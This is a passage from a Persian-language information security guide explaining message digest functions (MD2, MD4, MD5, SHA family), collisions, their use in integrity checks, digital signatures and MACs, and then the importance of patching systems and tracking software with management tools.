ﺍﻟﻒ( ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﺖﺗﺄﺛﻴﺮ ﻫﻤﺔ ﺑﻴﺘﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺍﺳﺖ.
ﺏ( ﺍﮔﺮ ﻳﻚ ﺑﻴﺖ ﻣﻔﺮﻭﺽ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺗﻐﻴﻴﺮ ﻛﻨﺪ ،ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ۵۰ﺩﺭﺻﺪ ﺷﺎﻧﺲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻥ ﺩﺍﺭﺩ.
ﺝ( ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﻭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ،ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻧﺒﺎﻳﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻞ ﺩﻳﮕﺮﻱ ﺑﺎ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻣﺸﺎﺑﻪ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﺩﻭ ﻓﺎﻳﻞ ﻣﺘﻔﺎﻭﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺸﺎﺑﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺗﻼﻗﻲ ١٠٣ﻧﺎﻡ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺗـﺎﺑﻊ
ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ،ﻻﺯﻡ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﺎ ﺗﻮﻟﻴﺪ ﺍﻳﻦ ﺗﻼﻗﻲﻫﺎ ﻋﻤﻠﻲ ﻧﺒﺎﺷﺪ.
ﻼ ﭼﻨﺪ ﻧﻤﻮﻧﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺴﻴﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺫﻳ ﹰ
MD2
١٠٤
ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ،۲ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﻳﻦ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺭ ﻣﻴﺎﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺗـﺎﺑﻊ ﺭﻳﻮﺳـﺖ
ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺤﺎﺳﺒﺎﺗﺶ ﻧﻴﺰ ﺑﻴﺸﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﻧﺘﻴﺠﻪ MD2ﺑﻨﺪﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ MD2 .ﻳـﻚ ﺧﻼﺻـﺔ ۱۲۸
ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
MD4
"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ "۴ﻫﻢ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺳﺮﻳﻌﺘﺮ ﺑـﺮﺍﻱ MD2ﺍﺑـﺪﺍﻉ
ﺷﺪ .ﻣﺘﻌﺎﻗﺒﹰﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪ ﻛﻪ MD4ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺎﻟﻘﻮﻩ ﺩﺍﺭﺩ .ﻳﻌﻨﻲ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﻛﻪ MD4ﻣـﺸﺎﺑﻬﻲ ﺑـﺎ
ﻳﻚ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﻴﺎﺯ ﺑﻪ ﺟﺴﺘﺠﻮﻱ brute forceﺑﺎﺷﺪ )ﻛﻪ ﺍﻟﺒﺘﻪ ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴﻞ ﻛﻪ ﺟـﺴﺘﺠﻮ ﺩﺭ ﻓـﻀﺎﻱ ﻛﻠﻴـﺪ ۱۲۸
ﺑﻴﺘﻲ ﻋﻤﻠﻲ ﻧﻴﺴﺖ ،ﺟﺴﺘﺠﻮﻱ brute forceﻫﻢ ﻋﻤﻠﻲ ﻧﻤﻲﺑﺎﺷﺪ( MD4 .ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﺔ ۱۲۸ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
MD5
"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﻩ "۵ﻧﻴﺰ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ ،MD5 .ﺍﺻﻼﺡ ﺷﺪﺓ MD4ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻛـﻪ ﺑـﺮﺍﻱ
ﺍﻳﻤﻦﺗﺮ ﻛﺮﺩﻥ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﺯ MD5ﺑﻪ ﻭﻓﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﺩﺭ ﺗﺎﺑﺴﺘﺎﻥ ۱۹۹۶ﭼﻨﺪ ﻧﻘﺺ ﺩﺭ ﺁﻥ ﻛﺸﻒ ﺷﺪ ﻛﻪ ﻣﻮﺟﺐ
ﺷﺪ ﮔﻮﻧﻪﻫﺎﺋﻲ ﺍﺯ ﺗﻼﻗﻲﻫﺎ ﺭﺍ ﺑﺘﻮﺍﻥ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺿﻌﻴﻒﺷﺪﺓ ﺁﻥ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩ .ﺩﺭﻧﺘﻴﺠﻪ MD5ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣـﻲﺩﻫـﺪ.
ﺍﺯ ﻫﺮﺩﻭﻱ MD5ﻭ SHA-1ﺩﺭ ﻓﻨﺎﻭﺭﻱ SSLﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ MD5 .ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﻪ ۱۲۸ﺑﻴﺘﻲ
ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
SHA
ﺍﻟﮕﻮﺭﻳﺘﻢ hashﺍﻳﻤﻦ ،١٠٥ﻣﺮﺗﺒﻂ ﺑﺎ MD4ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻫﻤـﺮﺍﻩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ
ﻓﻨﺎﻭﺭﻱ ) (NIST's DSSﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ NIST ،SHAﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ SHAﺑﺪﻭﻥ ﻳﻚ ﺗﻐﻴﻴﺮ ﻛﻮﭼﻚ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ SHA .ﻳﻚ ﺧﻼﺻﺔ ۱۶۰ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ.
SHA-1
ﺍﻟﮕﻮﺭﻳﺘﻢ " hashﺍﻳﻤﻦ ﺍﺻﻼﺡ ﺷﺪﻩ" ﻧﺴﺒﺖ ﺑﻪ SHAﻛﻤﻲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺩﺍﻧﺴﺘﻪ ﻧﻴﺴﺖ ﻛﻪ ﺁﻳﺎ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ SHA-1
ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ SHAﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ ،ﺍﻣﺎ ﻋﺪﺓ ﺯﻳﺎﺩﻱ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﭼﻨﻴﻦ ﻣﻲﻛﻨﺪ SHA-1 .ﻫﻢ ﻳﻚ ﺧﻼﺻﺔ ۱۶۰ﺑﻴﺘـﻲ ﺗﻮﻟﻴـﺪ
ﻣﻲﻛﻨﺪ.
103 Collision
104 Message Digest #2
105 Secure Hash Algorithm
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٢٩٩
SHA-512 ،SHA-384 ،SHA-256
ﺗﻮﺍﺑﻊ ،۳۸۴ ،۲۵۶ hashﻭ ۵۱۲ﺑﻴﺘﻲ ﺑﺘﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ،۱۹۲ ،۲۵۶ﻭ ۱۲۸ﺑﻴﺘﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ
ﺗﻮﺍﺑﻊ ﺗﻮﺳﻂ NISTﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺟﻬﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺸﺮﻓﺘﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻧﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻮﺍﺑﻊ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺑﻠﻮﻛﻲ ﻣﺜﻞ DESﺑﻌﻨﻮﺍﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴـﺎﻡ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﺗـﺎﺑﻊ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺎﻟـﺖ ﺭﻣـﺰﻱﺳـﺎﺯﻱ
ﺑﺎﺯﺧﻮﺭ ١٠٦ﺍﺟﺮﺍ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻛﻠﻴﺪ ،ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﻱ ﻛﻪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﻭ ﻣﺨﺼﻮﺹ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﺍﺳﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﺋﻴـﺪ .ﺗﻤـﺎﻡ
ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ .ﺁﺧﺮﻳﻦ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ،ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺳﺖ .ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ hashﻫﺎﻱ
ﻋﺎﻟﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﻛﻨﺪﺗﺮ ﺍﺯ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﺎﺑﻖﺍﻟﺬﻛﺮ ﻫﺴﺘﻨﺪ.
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭﺳﺎﺯﻱ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻚ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ .ﺑـﺮﺍﻱ ﭘﻴﺎﻣﺘـﺎﻥ ﻛـﺪ
MD5ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪ ﻛﻨﺎﺭﻱ ﺑﮕﺬﺍﺭﻳﺪ؛ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻓﺎﻳﻞ )ﻋﻤﺪﹰﺍ ﻳﺎ ﺳﻬﻮﹰﺍ( ﺗﻐﻴﻴـﺮ ﻳﺎﻓﺘـﻪ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﻛـﺪ
MD5ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺑﺎ ﺁﻥ MD5ﻛﻪ ﺑﺎﺭ ﺍﻭﻝ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻳﺪ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﺋﻴﺪ .ﺍﮔﺮ ﺑﺎ ﻫﻢ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ ،ﺑـﺎ ﺍﻃﻤﻴﻨـﺎﻥ ﺯﻳـﺎﺩ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﺮﺽ ﺭﺍ ﺑﺮﺁﻥ ﺑﮕﺬﺍﺭﻳﺪ ﻛﻪ ﻓﺎﻳﻞ ﺗﻐﻴﻴﺮ ﻧﻴﺎﻓﺘﻪ ﺍﺳﺖ.
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺪﻟﻴﻞ ﻭﻳﮋﮔﻴﻬﺎﻳﺸﺎﻥ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻣﺮﻭﺯﻱ ﻧﻴﺰ ﻫﺴﺘﻨﺪ .ﺧﻼﺻﻪﭘﻴﺎﻣﻬـﺎ ﻣﺒﻨـﺎﻱ
ﺍﻏﻠﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺑﺎﺷﻨﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﺮﻭﺯﻱ ﺗﺼﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﻛـﻞ ﺳـﻨﺪ ﻛـﺎﻓﻲ
ﺍﺳﺖ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﻨﺪ ﺍﻣﻀﺎ ﺷﻮﺩ.
ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺎﻡ ﻛـﻪ ﻳـﻚ ﺭﻣـﺰ ﻣـﺸﺘﺮﻙ ﺑـﻴﻦ ﺩﻭ ﻃـﺮﻑ ﺍﺭﺗﺒـﺎﻁ
ﻣﻲﺑﺎﺷﻨﺪ ﻭ ﺗﺄﻳﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺛﺎﺑﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪMAC .ﻫﺎ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﭘﻴﺎﻣﻲ ﻛﻪ ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﺷﻮﺩ ﺿﻤﻴﻤﻪ ﻣﻲﺷـﻮﻧﺪ ) RFCﺷـﻤﺎﺭﺓ
٢١٠٤ﭼﮕﻮﻧﮕﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺭﻫﻢﺭﻳﺰﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ(MAC .ﻫﺎﺋﻲ ﻛﻪ ﺑﺮ ﭘﺎﻳـﺔ ﺧﻼﺻـﻪﭘﻴﺎﻣﻬـﺎ ﻫـﺴﺘﻨﺪ ﺍﻣﻨﻴـﺖ
ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ.
ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ
ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ
ﺍﺯ ﻟﺤﻈﻪﺍﻱ ﻛﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ١٠٧ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﻣـﻲﺷـﻮﺩ ،ﺩﺭ ﻣﻌـﺮﺽ ﺗﻼﺷـﻬﺎﻱ ﻛـﺸﻒ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺍﻓـﺮﺍﺩ
ﻧﺎﺧﻮﺍﻧﺪﺓ ﺑﻴﺮﻭﻧﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻣﻬﺎﺟﻤﻴﻦ ،ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎ ﺳﺮﻋﺘﻲ ﺷﮕﻔﺖﺁﻭﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ .ﺟﺰﺋﻴﺎﺕ ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺩﺭ ﺍﻳـﻦ
ﻣﻮﺭﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻃﺮﺡ Honeynetﺣﻤﺎﻳﺖ ﻣﻲﺷﻮﺩ - http://project.honeynet.org/ -ﭘﻴﺪﺍ ﻛﺮﺩ .ﺩﺭ
ﻳﻚ ﻣﻮﺭﺩ ،ﻳﻚ ﺳﻴﺴﺘﻢ Honeynetﻛﻪ ﺟﺪﻳﺪﹰﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﻮﺩ ،ﺗﻨﻬﺎ ۱۵ﺩﻗﻴﻘﻪ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﺩﺭ ﺷﺒﻜﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪ ﺑـﺎ ﻣﻮﻓﻘﻴـﺖ
ﻫﺪﻑ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﻟﺬﺍ ﻻﺯﻡ ﺍﺳﺖ ﻫﺮ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﻭﺍﺭﺩ ﺷﺒﻜﻪ ﻣﻲﺷﻮﺩ -ﻫـﻢ ﻗﺒـﻞ ﺍﺯ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪ ﻭ ﻫـﻢ ﺑﻌـﺪ ﺍﺯ ﺁﻥ -ﺑـﺎ
ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﺩ.
106 Cipher Feedback Mode
107 Workstation
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻠﻲ ﻭ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺣﻴﺎﺗﻲ ﺍﺳﺖ .ﺷـﻤﺎ
ﺑﺎﻳﺪ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ،ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ .ﺩﺭﺧـﺼﻮﺹ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﻪﺗﻨﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺍﺳﺖ ،ﺑﻠﻜﻪ ﻫﻤﭽﻨـﻴﻦ
ﺍﻋﻤﺎﻝ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻳﻤﻨﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ.
٣٠٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﻚ ﺩﺳﺘﻪ ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﻆ ﺭﺩﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺪﺍﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﺼﺐ ﺷﺪﻩ ﻫﺴﺘﻨﺪ،
ﻭ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﻫﻴﭻ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻥ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﻳﺎ ﻧﻪ .ﺑﺪﻭﻥ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﻪ ﺑﺪﺍﻧﻴﻢ ﺁﻳﺎ
ﻳﻚ ﺟﺰﺀ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺭﻭﺯ ﺷﻮﺩ ﻳﺎ ﺍﻳﻨﻜﻪ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺘﻪ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﭘﺲ ﺍﺯ ﺑﻪ ﺭﻭﺯ ﺩﺭ ﺁﻣـﺪﻥ ﻣﺤﻔـﻮﻅ
